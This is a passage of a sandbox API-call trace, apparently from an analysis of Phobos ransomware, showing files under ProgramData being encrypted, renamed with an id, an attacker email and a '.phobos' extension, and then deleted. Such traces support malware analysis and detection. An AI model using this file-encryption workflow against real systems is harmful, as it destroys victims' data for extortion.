[0176.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.276] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.276] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x170f9, lpOverlapped=0x0) returned 1 [0176.296] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17100, dwBufLen=0x17100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17100) returned 1 [0176.299] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x17100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x17100, lpOverlapped=0x0) returned 1 [0176.300] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.300] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.300] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.300] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.300] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.301] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.301] CloseHandle (hObject=0x194) returned 1 [0176.301] CloseHandle (hObject=0x158) returned 1 [0176.301] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma")) returned 1 [0176.302] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.302] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.302] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=139197) returned 1 [0176.303] CloseHandle (hObject=0x158) returned 1 [0176.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma")) returned 0x20 [0176.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.303] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.303] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.303] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.303] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.303] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.303] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x21fbd, lpOverlapped=0x0) returned 1 [0176.313] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x21fc0, dwBufLen=0x21fc0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x21fc0) returned 1 [0176.314] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x21fc0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x21fc0, lpOverlapped=0x0) returned 1 [0176.323] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.323] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.323] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.323] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.323] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.323] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.323] CloseHandle (hObject=0x158) returned 1 [0176.324] CloseHandle (hObject=0x194) returned 1 [0176.324] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 08.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 08.wma")) returned 1 [0176.325] SetEvent (hEvent=0xe8) returned 1 [0176.325] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.326] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.326] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=112353) returned 1 [0176.326] CloseHandle (hObject=0x194) returned 1 [0176.326] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma")) returned 0x20 [0176.326] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.326] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.326] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.326] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.326] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.327] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.327] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.327] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1b6e1, lpOverlapped=0x0) returned 1 [0176.357] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1b6f0, dwBufLen=0x1b6f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1b6f0) returned 1 [0176.358] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1b6f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1b6f0, lpOverlapped=0x0) returned 1 [0176.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0176.360] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.360] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.360] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.360] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.360] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.360] CloseHandle (hObject=0x194) returned 1 [0176.360] CloseHandle (hObject=0x158) returned 1 [0176.360] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 09.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 09.wma")) returned 1 [0176.362] SetEvent (hEvent=0xe8) returned 1 [0176.362] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.362] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=94457) returned 1 [0176.363] CloseHandle (hObject=0x158) returned 1 [0176.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma")) returned 0x20 [0176.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.363] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.363] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.364] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.364] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.364] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x170f9, lpOverlapped=0x0) returned 1 [0176.373] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17100, dwBufLen=0x17100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17100) returned 1 [0176.374] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x17100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x17100, lpOverlapped=0x0) returned 1 [0176.376] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.376] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.376] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.376] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.376] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.376] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.376] CloseHandle (hObject=0x158) returned 1 [0176.376] CloseHandle (hObject=0x194) returned 1 [0176.376] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 10.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 10.wma")) returned 1 [0176.378] SetEvent (hEvent=0xe8) returned 1 [0176.378] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.378] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1282) returned 1 [0176.378] CloseHandle (hObject=0x194) returned 1 [0176.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk")) returned 0x20 [0176.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.378] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.379] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.379] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.379] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.379] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.379] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x502, lpOverlapped=0x0) returned 1 [0176.382] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510, dwBufLen=0x510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510) returned 1 [0176.382] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x510, lpOverlapped=0x0) returned 1 [0176.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.383] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.383] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.383] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.383] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.383] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.383] CloseHandle (hObject=0x194) returned 1 [0176.383] CloseHandle (hObject=0x158) returned 1 [0176.383] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\default programs.lnk")) returned 1 [0176.384] SetEvent (hEvent=0xe8) returned 1 [0176.385] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.385] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1388) returned 1 [0176.385] CloseHandle (hObject=0x158) returned 1 [0176.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk")) returned 0x20 [0176.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.385] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.385] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.386] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.386] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.386] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x56c, lpOverlapped=0x0) returned 1 [0176.387] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570, dwBufLen=0x570 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570) returned 1 [0176.387] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x570, lpOverlapped=0x0) returned 1 [0176.388] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.388] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.388] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.388] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.388] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.388] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.388] CloseHandle (hObject=0x158) returned 1 [0176.388] CloseHandle (hObject=0x194) returned 1 [0176.389] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\speech recognition.lnk")) returned 1 [0176.390] SetEvent (hEvent=0xe8) returned 1 [0176.390] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.390] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start 